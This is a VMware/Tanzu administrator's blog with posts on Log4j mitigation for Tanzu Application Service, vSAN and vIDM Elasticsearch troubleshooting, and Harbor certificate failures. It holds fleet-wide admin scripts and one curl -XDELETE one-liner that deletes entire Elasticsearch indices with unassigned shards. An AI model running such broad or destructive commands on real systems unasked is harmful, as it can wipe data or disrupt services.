The Fluffy Admin

Spoke at the VMUGNL 2021

Thefluffyadmin — Mon, 11 Apr 2022 16:56:12 +0000

VMUGNL - Different between TKG versions

Late last year, I spoke at the VMUGNL about the differences between the different TKG versions; TKGi, TKGm and TKGs, as they existed at the end of 2021

Talk is in Dutch (which is quite rare for me)

Log4j Security Vulnerabilities CVE-2021-44228 – Mitigation Strategies for Tanzu Application Services Operators

Thefluffyadmin — Wed, 15 Dec 2021 19:08:25 +0000

This post was created by the VMware Tanzu Vanguard community. (https://tanzu.vmware.com/vanguard)
This community is a small group of VMware Tanzu users, who came over from the Pivotal community, and represent some of VMware's largest and coolest TAS (Tanzu Application Services) and TKGI (Tanzu Kubernetes Grid Integrated) customers and partners. This community is lead by the incomparable Brian Chang --> https://twitter.com/techadvoguy
While I am mentioned in the credits.. I really only contributed the xkcd image :p

------------

Log4j Security Vulnerabilities CVE-2021-44228 - Mitigation Strategies for TAS Operators

By the Tanzu Vanguard community - key contributors: Simmy Xavier, Charles Lester, Juergen Sussner, Jonathan Regehr & Robert Kloosterhuis

Summary Brief:

Apache Log4j is a very widely used and popular logging library within the Java logging framework. There is a vulnerability named as Log4Shell identified and is being tracked officially under CVE-2021-44228 (and a second one under CVE-2021-45046). The vulnerability allows for RCE (Remote Code Execution) attacks which significantly increase the risk of exploitation. Hackers could use this to post malicious code which can be used for crypto mining or information extraction. There are reports of increased scanning happening across the Internet to identify vulnerable systems and infect them with malware or ransomware. This issue was discovered as early as Dec 1st by Chen Zhaojun of Alibaba Cloud Security Team and impacted across log4j-core v2.0 to v2.14.1. Apache had released the version v2.15.0 as of Dec 5. Apache has released version v2.16.0 as of Dec 14. This vulnerability has a severity rating of 10 out of 10 and is treated as a Zero-day vulnerability as of Dec 10 when this became a public disclosure.

Description:

If you have a system that uses log4j and you can get that system to log a JNDI URL or a shell command, log4j will actually execute the shell command.

The simplest one is a Minecraft server - they log any chat messages that are sent, so if you put something malicious in the chat message, log4j will execute it as it logs the message.
The TAS platform itself uses a vulnerable Log4j library in some of the tiles and the TAS tile. Apps built with the Java buildpack may also pull in vulnerable libraries

CISA is not able to confirm that merely using a newer JRE is sufficient for protection. See the discussion at this blog http://www.openwall.com/lists/oss-security/2021/12/10/3 and in the meantime, it is also confirmed that a modified version of this exploit is not restricted to a specific JVM version

Full remediation requires the use of log4j >= 2.16.0. The mitigation strategies merely reduce the attack surface area but do not fully protect against the threat.

Mitigation strategies for TAS

For systems running log4j >= 2.10.0 (thanks, Simmy Xavier!):

One approach is to set the LOG4J_FORMAT_MSG_NO_LOOKUPS variable in the running environment variable group, reflected in example (1) below. The limitation to this approach is that “Any user-defined variable takes precedence over environment variables provided by these groups.”
Another approach is to place the variable in the environment of every app, reflected in example (2) below. The limitation to this approach is that a subsequent restage of the application will cause the variable to be lost.
Instead of setting the env variable LOG4J_FORMAT_MSG_NO_LOOKUPS you can also add -Dlog4j2.formatMsgNoLookups=true to the JAVA_OPTS variable

For any systems running log4j 2.*

The more comprehensive mitigation strategy is to remove the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)

For older 1.x versions:

Although 1.x seems to be not affected by this, it is an old version which is out of support for a really long time and may be vulnerable to various other problems. Therefore Log4J 1.x should also be considered for updates. Depending on the Apps this could be achieved fairly simply by using the API bridge as described here: https://logging.apache.org/log4j/2.x/manual/migration.html

Example mitigation strategies for TAS running log4j >= 2.10.0 (thanks to Simmy Xavier):

Set the running environmental variable group (see https://docs.cloudfoundry.org/devguide/deploy-apps/environment-variable.html#evgroups) (restart requires CLI >= 7) (note: if you have any existing running environmental variables, then you’ll need to add those into the srevg command, as the command expects to receive all the variables for the group, i.e., the command will set the revg to only what you specify in the command):

cf srevg '{"LOG4J_FORMAT_MSG_NO_LOOKUPS":"true"}'

cf restart  --strategy rolling

2. Set the environment variable for a particular app (restart requires CLI >= 7):


cf set-env  LOG4J_FORMAT_MSG_NO_LOOKUPS true

cf restart  --strategy rolling

3. Script to loop through all apps in a space, apply the change in (2) and restart the app (restart requires CLI >= 7):

cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName

do cf set-env $appName LOG4J_FORMAT_MSG_NO_LOOKUPS true; 

cf restart $appName --strategy rolling

done

4. Script to apply the change in (1), then loop through every app in every space in every org, and restart the app (restart requires CLI >= 7) (you may want to edit the loops to exclude certain orgs, spaces, or apps):

'''

Applies the fix, then runs through every org in every space, and restarts every app

Note that “Any user-defined variable takes precedence over environment variables provided by these groups.” 

'''

cf srevg '{"LOG4J_FORMAT_MSG_NO_LOOKUPS":"true"}'

for org in $(cf orgs | sed -n '4,$p' | awk '{print $1}')

  do 

    cf t -o $org 1>/dev/null 2>&1

    for space in $(cf spaces | sed -n '4,$p' | awk '{print $1}')

      do cf t -o $org -s $space 1>/dev/null 2>&1

        rc=$?

        if [[ $rc -eq 0 ]]

          then

               apps=$(cf apps | sed -n '4,$p' | awk '{print $1}')

               for app in $apps

                  do cf restart $app –-strategy rolling

                  done

          else echo "cf t -o $org -s $space failed"

        fi

      done

  done

5. Script to loop through every app in every space in every org, apply the change in (2) and restart the app (restart requires CLI >= 7) (you may want to edit the loops to exclude certain orgs, spaces, or apps):

'''

Runs through every org in every space, applies the (temporary) fix, and restarts the app 


'''

for org in $(cf orgs | sed -n '4,$p' | awk '{print $1}')

  do 

    cf t -o $org 1>/dev/null 2>&1

    for space in $(cf spaces | sed -n '4,$p' | awk '{print $1}')

      do cf t -o $org -s $space 1>/dev/null 2>&1

        rc=$?

        if [[ $rc -eq 0 ]]

          then

               apps=$(cf apps | sed -n '4,$p' | awk '{print $1}')

               for app in $apps

                  do cf set-env $app LOG4J_FORMAT_MSG_NO_LOOKUPS true

                     cf restart $app --strategy rolling

                  done

          else echo "cf t -o $org -s $space failed"

        fi

      done

  done

Hint:

When using cf restart app –strategy rolling, the process of the rolling restart utilizes TAS features called deployments and this requires new apps to be started while the old ones are still running. This requires some additional ORG Quota or in other words, a rolling restart will fail in an ORG with no Quota left.

Apache mitigation recommendations

Apache's recommendations, located at https://logging.apache.org/log4j/2.x/security.html, depending on the version of log4j2, are:

Log4j version	Mitigation Plan
2.16.0	Nothing
2.15.0	Upgrade to 2.16.0
2.10.0 - 2.14.1	Upgrade to 2.16.0 OR Add Environment Variable "LOG4J_FORMAT_MSG_NO_LOOKUPS" to "true" OR Add system property "log4j2.formatMsgNoLookup" to "true"
2.0 - 2.9.1	Upgrade to 2.16.0 OR Remove JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
1.x	Log4j 1.x is no longer supported at all, and a bug related to Log4Shell, dubbed CVE-2021-4104, exists in this version

Several of the VMware products along with other vendors are using this popular framework and actively working in releasing a workaround and or a patch. VMware products impacted and the status of patch and workaround is posted under the Security Advisory located at https://www.vmware.com/security/advisories/VMSA-2021-0028.html

Based on the blog on Spring.io (https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot), Spring Boot users are only impacted if they have switched the default logging system to log4j2.

Workarounds until a patch can be applied across the TAS foundation would be to set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS as true This could be done at a Global Level or at an App level but in either case require a restart for it to take effect.

Setting at Global level - cf srevg '{"LOG4J_FORMAT_MSG_NO_LOOKUPS":"true"}'

Setting at an App Level - cf set-env LOG4J_FORMAT_MSG_NO_LOOKUPS true

Restart the app instances in a rolling fashion (require cf cli v7+) - cf restart --strategy rolling

Validating the change - cf env | grep LOG4J

Other useful scripts

Script to set environment variable (all apps in a space)

cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName; do cf set-env $appName LOG4J_FORMAT_MSG_NO_LOOKUPS true; done

Script to perform Rolling restart (all apps in a space)

cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName; do cf restart $appName --strategy rolling; done

Script to validate (all apps in a space)

cf apps | sed -n '4,$p'| awk '{print $1}' | while read appName; do cf env $appName | grep LOG4J ; done

How TAS as immutable infrastructure helps

Despite all the mitigation strategies, there is still a risk that some remote Code got dropped in a running Container. To proactively cope with that you can use the features of TAS where containers get recreated from an immutable source Image (the droplet). So why not run the restart scripts above on a regular basis, to constantly wipe out all that got into a container.

Monitoring app changes on TAS

Pathing TAS is essential and having Apps secured should be the first priority. But you may also want to know how your apps are behaving and if they have any vulnerable version within their containers. To get to know this you can set up a search job to investigate all running containers.

The Following Script can be run as a task in TAS

API=`echo $VCAP_APPLICATION | jq -r ".cf_api"`




cf login -a $API -u $USER -p $PASSWD -o dummyorg -s dummyspace

for org in $(cf orgs | sed -n '4,$p' | awk '{print $1}')

  do

    cf t -o $org 1>/dev/null 2>&1

    for space in $(cf spaces | sed -n '4,$p' | awk '{print $1}')

      do cf t -o $org -s $space 1>/dev/null 2>&1

        rc=$?

        if [ $rc -eq 0 ]

          then

               apps=$(cf apps | sed -n '4,$p' | awk '{print $1}')

               for app in $apps

                  do 

                     log4jversion=`cf ssh "$app" -c "cd /app; find -iname '*$PATTERN*'" |tr '\n' ' '` 

                     rc=$?

                     if [ $rc -eq 0 ]

                     then

                        if [ -z "$log4jversion" ]

                            then

                                echo "ORG=$org   SPACE=$space   APP=$app LOG4JVERSION=not found"

                            else

                                echo "ORG=$org   SPACE=$space   APP=$app LOG4JVERSION=$log4jversion"

                        fi 

                     else 

                        echo "ORG=$org   SPACE=$space   APP=$app LOG4JVERSION=not-ssh-able"

                     fi

                  done

          else echo "cf t -o $org -s $space failed"

        fi

      done

  done

This script will ssh into every container running on TAS and search its filesystem for log4j versions. You can utilize the TAS scheduler (https://network.pivotal.io/products/p-scheduler/) to run this TASK once a day

The Log output can be forwarded to any Log Management System which allows you to create a “real time” dashboard.

If you use Splunk, the query would be:

index= cf_app_name=AdminScripts event_type=LogMessage 

| rex field=msg  "ORG=(?.*)   SPACE=(?.*)   APP=(?.*) LOG4JVERSION=(?.*)" 

| eval files=split(testresult," ")

| rex field=files "log4j-core-(?.*).jar"

| eval log4jversion=mvjoin (mvsort(mvdedup(log4jversion)), ",")

| table orgname, spacename, appname, log4jversion, files

| sort log4jversion desc

This creates a nice visualization like this

With this, you can get an Overview of which app uses which version and as you can see in this example there are sometimes “hidden” Versions or more than one Version within the app as agents like the AppDynamics Agent have their own version in place.

Patching apps the hard way…

You may also face apps that refuse to be patched because there is no source code available or no pipeline or for whatever reason. In this case, you can try the following approach to patch such apps.

```
cf app  vulnerableApp –guid
```
```
cf curl /v3/apps//packages
```

Copy the download link from the links section

```
cf oauth-token 
```

curl -L  –header “Authorization: ” -o app.zip

Now path whatever needs to be patched in the app.zip

```
cf create-app-manifest vulnerableApp
```

cf push fixedApp -f vulnerableApp_manifest.yml -p app.zip

```
cf stop vulnerableApp
```

This will deploy a second, patched version alongside the vulnerable app with the same settings, effectively having a blue-green deployment of a patched and a vulnerable app.

Appendix:

How to detect the Log4j vulnerability in your applications: https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html
Apache Log4j Security Vulnerabilities: https://logging.apache.org/log4j/2.x/security.html
URGENT: Analysis and Remediation Guidance to the Log4j Zero-Day RCE (CVE-2021-44228) Vulnerability:
https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228
National Vulnerability Database for CVE-2021-44228 (with some excellent links): https://nvd.nist.gov/vuln/detail/CVE-2021-44228
National Vulnerability Database for CVE-2021-45046 (with some excellent links): https://nvd.nist.gov/vuln/detail/CVE-2021-45046
CISA guidance https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
LunaSec blog post (Thanks Jonathan Regehr!): https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/
Cloud Foundry post: https://www.cloudfoundry.org/blog/log4j-vulnerability-cve-2021-44228-impact-on-cloud-foundry-products/
VMware advisory: https://www.vmware.com/security/advisories/VMSA-2021-0028.html
VMware KB on products not affected: https://kb.vmware.com/s/article/87068
BlueTeam CheatSheet, Advisories by all vendors
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/

And when you need a laugh: https://log4jmemes.com/

Mysterious vSAN datastore alert – and the relationship between First-Class disks and Cloud-Native storage

Thefluffyadmin — Fri, 27 Aug 2021 15:56:57 +0000

Aug 27th, Robert Kloosterhuis

-----------

I ran across an interesting 6.7 vSAN alarm today, that baffled me. This is vSphere 6.7 Update 3L (6.7.0.46000)

Improved virtual disk infrastructure namespaces storage policy (alarm)

So this is referring to the config setting we can find under Storage --> vSAN Datastore object --> Configure -- General

This is a config setting that was introduced.. uhh.. somewhere.. but I could not find any reference or documentation about it.

There is no mention of the policy setting at all in the official docs for 6.7 or 7.0 ( https://docs.vmware.com/en/VMware-vSphere/6.7/com.vmware.vsphere.virtualsan.doc/GUID-F52F0AE9-FB31-4236-B566-D9610B14C670.html ) .

I suspect the alarm is being triggered in our case, because, as you can see from the screenshot, the setting was 'blank'. I assume that in this case, it would revert to its default previous behaviour; to inherit the set VM Default Storage policy. I am not sure about this though.. what would be the point of the alarm then?

But the wording between this config setting, and the warning, is all slightly different, so I am not sure.

'Home Storage Policy' vs 'Improved Virtual Disk Home Storage Policy' vs 'Improved virtual disk Infrastructure Namespaces Storage policy (alarm)'

So what is this referring to anyway??

Cormac Hogan has a nice set of blog articles on this:

A primer on First Class Disks/Improved Virtual Disks

and:

https://cormachogan.com/2020/01/14/first-class-disks-enhanced-virtual-disks-revisited/

So Cormac's blog post is from 18 months ago. Has, in the meantime, VMware settled on a standard name for these things?

First Class Disks (FCD)
Improved Virtual Disk (IVD)
Managed Virtual Disks
Enhanced Virtual Disks

It seems not, because while the vSphere 6.7 web client referred to these things as 'Improved Virtual Disks' , the vSAN/CNS part of VMware still calls them 'First-Class Disks, or FCD's for short.
But no mention of IVD's anywhere in the core vSAN docs (I did a search across the 4 PDFs). Its a shame cause this is pretty interesting technology.
Ironically, they are mentioned far more as part of the vRealize 8 documentation, here are some links:

https://docs.vmware.com/en/VMware-Cloud-Assembly/services/Using-and-Managing/GUID-64FB525D-CDE5-48BC-8B87-8DAAA6369776.html
https://www.ntpro.nl/blog/archives/3630-vRealize-Automation-First-Class-Disk-FCD.html
https://vdc-repo.vmware.com/vmwb-repository/dcr-public/b83a47dc-134c-4295-a7a0-212b858e2a3c/9e342828-face-41ab-9f23-c539f72468c5/GUID-3FB348EE-46F0-46F6-A99E-BC1388604FC4.html

Here is a mention of them, in regards to how they are used in Cloud Native Storage (or CNS). And in fact, this CNS use appears to be the primary use-case of FCD's being added to vSphere in the first place. But good luck finding that out :p

https://core.vmware.com/blog/whats-new-vsphere-7-update-2-core-storage

Persistent Volumes (PV) are created in vSphere as First-Class Disks (FCD). FCDs are independent disks with no VM attached. With the release of vSphere 7.0 U2, we are adding snapshot support of up to 32 snapshots for FCDs. This enables you to create snapshots of your K8s PVs which goes along with the SPBM multiple snapshot rules.

More information on the vSphere CSI is here:
https://vsphere-csi-driver.sigs.k8s.io/

This is actually pretty important.. if in the vSphere CSI (Container Storage Interface) for Kubernetes, Persistent Volumes are FCD objects... and you can be in a situation where there is no default policy applied to them in vSAN.. then.. uhh.. they are NOT protected. Right?

Well.. no .. because even if this config setting is left blank, CNS objects seem to inherit the default storage policy set for the vSAN datastore. I double checked:

So to my mind.. that makes the alert message... well.. pointless?

It should be noted that in vSphere with Tanzu (TKGs), the storage policy for these kinds of objects is handled quite differently. The associated vSAN storage policy is in that case, associated with the vSphere Namespace

Here are some slides I made that explain how that works:

Up to today, the vCenter alarm Improved virtual disk infrastructure namespaces storage policy alarm) was completely ungooglable. That is the main reason for this blog post now existing.

But I hope this simultaneously explains a bit about what this 'Improved Virtual Disks' are all about. I was a little shocked how little there is in the form of official documentation around this, from VMware.

Speaking about Tanzu Kubernetes Grid at VMWorld2021 Code Connect and the UK- North West England VMUG!

Thefluffyadmin — Fri, 20 Aug 2021 10:36:28 +0000

Aug 20th, Robert Kloosterhuis

Its been a very Tanzu year for me, after my 'Tanzu for ~~Dummies~~ Beginners' session (and CMTY Podcast appearance), I am continuing to do some public speaking about Tanzu topics the coming months!

I will be focussing on TKG itself, and more specifically the 3 different flavors of Tanzu Kubernetes Grid that VMware currently has available: TKGi (ex Pivotal PKS), TKG(m), and TKG(s) (aka 'vSphere with Tanzu') and the differences between them. I am gonna deep dive into each version, look at how they are deployed, how they are used, and compare the configuration and design choices you will face with each.

VMworld 2021 Code Connect - The State of the TKG Art [CODE2780] - Oct 5

Via the VMware{code} Program, (in which I am a Code Coach) , and the Code Connect event that is attached to VMworld2021 this year, I have a session that you can find in the VMworld scheduler!

Use this search string to find it:

https://myevents.vmware.com/widget/vmware/vmworld2021/catalog?search=tkg, or just look for CODE2780

I would also like to highlight the Session by Scott Rosenberg, Adding Custom Logic to TKG Cluster Deployment [CODE2749]

UK- North West England VMUG - Sep 9

Nathan Byrne (@Vm_nathbyrne) very graciously invited me to speak at the UK North West VMUG (@NWEnglandVMUG).

Sign-up for it here:
https://my.vmug.com/s/community-event?id=a1Y4x00000020cTEAQ

vIDM Elasticsearch failing due to idm plugin messing with node count – hard fix

Thefluffyadmin — Mon, 29 Mar 2021 17:43:02 +0000

Robert Kloosterhuis, march 29, 2021

I ran into a strange issue with a vIDM 3.3.2.0 appliance today

(vIDM , or 'VMware Identity Manager' , is now called 'VMware Workspace ONE Access')

The issue I had involved a single-node deployment.

This is an important detail. vIDM can be clustered, and that means that many of the services it runs inside (RabbitMQ, Elasticsearch) can also be clustered. The 'fix' I describe in this post (actually more of a workaround), should only ever be attempted on a single-node deployment. It will break the ability to make your vIDM install clustered. This is unsupported and totally at your own risk.

The issue was this:

I was getting frequent errors in the vIDM user interface, referencing the Analytics service.

"Call to Analytics failed with status: 500"

The Analytics service is, basically, a local installation of Elasticsearch, included on the vIDM appliances. And clustered if you have more than 1 vIDM node.

I don't have any screenshot myself, but this post also nicely demonstrates what you would see in the vIDM Health Dashboard:

https://geekcubo.com/vmware-identity-manager-cluster-19-03-elastic-search-service-issues/

Basically the 'Integrated Components' check in the Health Dashboard would be red. But in my case, no data at all was being produced by Elasticsearch. All the values where 'unknown'.

To troubleshoot, we need to ssh into the vIDM VM, with the local 'sshuser' account. And then sudo to root.

When I tried to troubleshoot, it was obvious that I could not even get into the Elasticsearch API at all. It was throwing nothing but error 500's

curl 'http://localhost:9200/_cluster/health'
{"error":{"root_cause":[{"type":"null_pointer_exception","reason":null}],"type":"null_pointer_exception","reason":null},"status":500}

curl -XGET 'http://localhost:9200/_cat/indices?v'
{"error":{"root_cause":[{"type":"null_pointer_exception","reason":null}],"type":"null_pointer_exception","reason":null},"status":500}

The elasticsearch log can be found here: /opt/vmware/elasticsearch/logs/horizon.log

I tailed it, and gave elasticsearch itself a restart

service elasticsearch restart

Stopping elasticsearch: process in pidfile `/opt/vmware/elasticsearch/elasticsearch.pid'done.
horizon-workspace service is running
Waiting for IDM: Ok.
Number of nodes in cluster is : 1
Configuring /opt/vmware/elasticsearch/config/elasticsearch.yml file

I then tried to ask its health status a few times while it started, to see if it came up at all.

Briefly, it did, before it died again!


curl 'http://localhost:9200/_cluster/health?pretty'rt
{
"cluster_name" : "horizon",
"status" : "yellow",
"timed_out" : false,
"number_of_nodes" : 1,
"number_of_data_nodes" : 1,
"active_primary_shards" : 60,
"active_shards" : 60,
"relocating_shards" : 0,
"initializing_shards" : 0,
"unassigned_shards" : 60,
"delayed_unassigned_shards" : 0,
"number_of_pending_tasks" : 0,
"number_of_in_flight_fetch" : 0,
"task_max_waiting_in_queue_millis" : 0,
"active_shards_percent_as_number" : 50.0
}

When I examined the log, it saw pretty quickly why I was getting an error 500.

It shows Elasticsearch is starting normally. It then discovers it has 244 indices to clean up (more on that later), so its sets health to yellow. But that is fine. At least its not a complete fail.

But then something odd happens.

Something called 'com.vmware.idm.elasticsearch.plugin' makes an appearance and starts, somehow, messing with the node count that Elasticsearch itself maintains for its cluster.

This VMware KB kind of explains what might be going on here https://kb.vmware.com/s/article/74709 , though it references a similar, but different error, actually a timing situation involving a cluster consisting of more than 1 node.

The point though, is this:

'com.vmware.idm.elasticsearch.plugin' is a

plugin for elasticsearch that asks IDM for the list of nodes that are expected to be in the cluster. It uses that list to determine how many nodes it should be able to see before a primary can be elected and the cluster formed.

Seems logical, Elasticsearch cant know by itself what kind if cluster topology you build with vIDM, but vIDM knows.

Based on the log, what seemed to be happening is that Elastic starts normally, it loads in its config from

/opt/vmware/elasticsearch/config/elasticsearch.yml

This config includes how many cluster nodes are expected (in my case, just 1, cause there is no cluster).

But then, for some reason, the idm plugin tries to update the running cluster count again and here something goes wrong. The elastic cluster service, ends up removing its only node, and then of course, Elastic service dies. The next message is that the cluster service can no longer connect.

I have no idea why this is happening. And it was pretty consistent. Every time I restarted the Elastic Service or rebooted the VM. The config for the IDM plugin is also contained in /opt/vmware/elasticsearch/config/elasticsearch.yml , but it doesn't keep its own nodecount value, so I am not sure why it thinks it can safely tell the cluster service to remove the only node for whatever reason.

Anyway, the workaround here, is pretty straightforward; simply disable the IDM plugin by setting the 'discovery.zen.idm.enabled' value to false. ( in /opt/vmware/elasticsearch/config/elasticsearch.yml )

Obviously this is unsupported, so do this at your own risk. If you ever expand the vIDM installation into a cluster, that will obviously break now, so you will have to turn this back on again. At that point, perhaps best to raise a VMware support ticket around this.

Bonus: Cleaning up unassigned shards

If you health stays yellow due to a number of 'unassigned shards' hanging around forever, you can force-delete them with the following one-liner:

curl -XGET http://localhost:9200/_cat/shards | grep UNASSIGNED | awk {'print $1'} | xargs -i curl -XDELETE "http://localhost:9200/{}"

Guest on the VMware Community Podcast – and my upcoming Tanzu VMware{code} session

Thefluffyadmin — Thu, 25 Mar 2021 12:02:19 +0000

Robert Kloosterhuis; https://thefluffyadmin.net/ , 25march2021

Had an excellent time on the #vmware #vcommunity podcast with last night.

Full recording here:

My upcoming VMware{code} session on Tanzu for Beginners, for the 9th of April, is here: blogs.vmware.com/code/2021/03/0

#tanzu #itqlife

Useful Bosh Oneliner to restart something on a bunch of TKGi nodes.

Thefluffyadmin — Tue, 02 Mar 2021 17:56:48 +0000

Robert Kloosterhuis, 2 march 2021

Found myself is a situation where I had to restart fluentd on every VM in a 130-node (!) TKGi(PKS) Kubernetes cluster.

Fluentd is managed through Monit, and you can run a command through the Bosh ssh command. In this case: sudo monit restart fluentd

So one of the customer admins that is way more fluent in bash that me, made this.

bosh -e  -d service-instance_e30c8cc7-ada0-4e70-9e72-455682749aaa vms | \
awk '{print "bosh -e  -d service-instance_e30c8cc7-ada0-4e70-9e72-455682749aaa ssh "$1" -c \"sudo monit restart fluentd\""}' \
> start-fluentd.sh

And then simply check and run start-fluentd.sh

Troubleshooting Certificate mismatch in Harbor in TKGi

Thefluffyadmin — Wed, 24 Feb 2021 10:21:49 +0000

I recently deployed harbor for a customer. This is the version of Harbor that has been pre-packaged into a 'Tile' , for use in Tanzu Kubernetes Grid Integrated edition [TKGi] (formerly known as Pivotal Container Services [PKS].

The tool that will deploy Harbor, in this case, is the Ops Manager, and it gives you a nice interface where you can set up all the essential settings for Harbor.

One of the things you can set, is the certificate to be used by Harbor.

In this case, we had the customer generate a certificate for us, for Harbor. The bottom field is meant for the certificate of the Certificate Authority, that generated the Harbor certificate.

I made a simple mistake here. Previously, the customer had generated Certificates from their root CA. However, this time, they had set up an intermediate, issuing CA. I did not know this, and had assumed the certificate chain was the same as previously. So I pasted the wrong certificate into this field. The Root-CA, instead of the issuing, intermediate CA.

When I tried to deploy Harbor using Opsman, the deployment failed. "Error: 'harbor-app/4d891315-d61e-4891-8512-486b7f93e5a2 (0)' is not running after update. Review logs for failed jobs: harbor"

How it failed is interesting, and that is what this post is mostly about.

Opsman uses the BOSH, under the covers, to create and manage the VM's, and their content, for any product it deploys.

It uses the Monit tool, to monitor the health of its VMs, and the result of Monit is also used to determine, whether a deployment was successfully completed or not.

In fact it is left to Monit to start, and stop, the various processes on a BOSH-managed VM. So Monit will contain a config for specific processes, to start, stop, and monitor their health. This can be as simple as monitoring a process ID, or can be custom scripts. In the case of Harbor, its some custom scripts that I will detail below.

In order to further troubleshoot this issue, we had to dig a bit deeper into the logs. There are 2 ways to do this; you can download a log-bundle using the Opsman UI

Or you can SSH into the VM, using the BOSH commandline tool, and view the logs live in the /var/vcap/sys/log directory.

Examining the log structure, there are some things to note.

First of all, because this is a BOSH deployment of Harbor, there are various folders that refer to BOSH-specific items.
Harbor itself, runs as a set of Docker containers. So there you will also find a split between logs coming from Docker, or in this case, the results of Docker-Compose, and the Harbor app components itself.

If you look in the Harbor folder, we find the various logs that relate to starting and stopping of Harbor, and then a further folder, that contains the Harbor app-component logs (1 per container).

Opsman told us, that the Harbor app itself was not starting. And we know its actually using Monit to start, stop and monitor Harbor. And its a set of scripts to do this.

The monit log can be found here: /var/vcap/monit/monit.log

As I said, Habor consists of a set of running Docker containers. If you wish to view this directly, we can actually use Docker on the VM.

SSH into the VM:

We need to run as root, and need to make sure the Docker client, can find the local docker daemon running.

sudo su -
alias docker='/var/vcap/packages/docker/bin/docker -H unix:///var/vcap/sys/run/docker/dockerd.sock'

Now we can simply run a 'Docker ps' and see our containers

Now the cool thing is, you can simply kill all these processes if you want, and Monit will restart them. That can be very useful when testing things.

Lets have a look at the monit configuration for Harbor:

monit -v status

Monit is using a specific script, to start and stop Harbor, /var/vcap/jobs/docker/bin/ctl
If it meets the failure condition, it will use the same script to try and restart it.

The results of the ctl script, are being saved to ctl.stdout.log
In that file, we can see that the Harbor startup, is timing out, well at least according to the script.

[Mon Feb 15 15:30:43 UTC 2021] Harbor service is not ready. Waiting for 5 seconds then check again.
[Mon Feb 15 15:30:48 UTC 2021] Harbor service is not ready. Waiting for 5 seconds then check again.
[Mon Feb 15 15:30:53 UTC 2021] Error: Harbor Service failed to start in 180 seconds.

Now the odd thing here was, that when I checked 'Docker ps', all the containers where actually running. And in fact, I could even reach the Harbor webUI without any problem.

So Harbor was actually working. Why then was the ctl script concluding that the startup had failed? What was it tripping over?

Harbor is actually coming up normally every time. Its monit that is confused.

Monit is set to check the existence of the file ‘/var/vcap/sys/run/harbor/harbor.pid’

However, for whatever reason, when I checked this file did not exist, so monit keeps thinking it failed to start, and tries to restart the whole container set.

This actually keeps failing, as all containers are already starting, the command '/var/vcap/jobs/loggr-system-metrics-agent/bin/ctl start' doesn’t seem to actually do anything in this case.
So monit ends up in a loop, and bosh (monit) reports the VM as ‘failing’ state. (this is why the deployment ‘fails’, but it didn’t, actually).

So what is in the location file ‘/var/vcap/sys/run/harbor/’ ?

harbor.tmp.pid, not harbor.pid, as monit is expecting.

Now there was another thing that caught my attention; the cron.log file, was filling up with these mysterious python errors:

curl -s --cacert /var/vcap/jobs/harbor/config/ca.crt https:///api/v2.0/systeminfo
Traceback (most recent call last):
File "", line 1, in 
File "/var/vcap/packages/python/python2.7/lib/python2.7/json/__init__.py", line 291, in load
**kw)
File "/var/vcap/packages/python/python2.7/lib/python2.7/json/__init__.py", line 339, in loads
return _default_decoder.decode(s)
File "/var/vcap/packages/python/python2.7/lib/python2.7/json/decoder.py", line 364, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/var/vcap/packages/python/python2.7/lib/python2.7/json/decoder.py", line 382, in raw_decode
raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded

This log output in cron.log, was a bit confusing. We can see it doing a curl command using the CA cert. But then it spits out a bunch of Python errors? Are the two related? Where is this coming from?

To understand what is going on, I needed to dig into the scripts.

As it turns out, the ctl script is actually using a different script altogether, to do a healthcheck on Harbor.

Ctl contains a function called ‘waitForHarbor’
This merely calls ‘/bin/status_check’ and waits for it to complete for 180 seconds.

And it is the results of this ‘/bin/status_check’ script that are being logged to cron.log.

The ctl script is also responsible for maintaining the harbor.pid file. And this file is the health indicator that monit is actually triggering on.

So that explains the behavior we are seeing. But why is it not passing 'waitForHarbor' aka, the ‘/bin/status_check’ script?

When we look at the ‘/bin/status_check’ script, it contains a bunch of healthchecks.

The source of the file, can actually be found here, if you want to see for yourself: https://github.com/vmware/harbor-boshrelease/blob/master/jobs/harbor/templates/bin/status_check.erb.sh

This section immediately caught my eye:

You can actually run the entire script yourself, and now it becomes obvious where those python errors where coming from:

So what is it doing here?

curl --cacert verifies a CA cert, against the URL you specify.

If it fails, it will produce the text below.

However, in the check script, its set to curl -s for silent. In this case, it will fail silently.. curl wont produce any output at all.

url=`${curl_command} ${protocol}://${harbor_url}/api/v2.0/systeminfo | python -c "import sys, json; print json.load(sys.stdin)['registry_url']"`

But its still trying to pipe it to Python to do some kind of json breakdown of the output.

If curl doesn't fail, and the CA cert validates against the URL, the the python json filter will simply return the url again.

And this is where it fails. This section in the script contains no failure handling, in case the CA cert that you set in the config, doesn't actually validate against cert used by Harbot itself. And this was the case with me. I set the wrong CA cert (the root CA, instead of the intermediate, issuing CA).

So this was the root cause that Monit was failing the VM. It was not getting passed this part of the check_script. But its not really obvious from the logs, not even the cron.log, what is going wrong exactly!

The irony here, is that Harbor actually was working fine. In fact, I have not been able to find anywhere or any reason that Harbor actually requires CA cert at all! Its only the check-script that requires it, and that seems to be the only reason you have to give it the CA cert in the Opsman Tile config!

Presentation “Tanzu for Dummies” – 29th Jan 2021

Thefluffyadmin — Thu, 21 Jan 2021 17:08:22 +0000

I will be doing a Tanzu Session on the 29th. This is my own effort to help explain the VMware Tanzu portfolio to our customers, and anyone else who might be interested!

"Tanzu for Dummies"
https://itq.eu/presentation-tanzu-for-dummies/

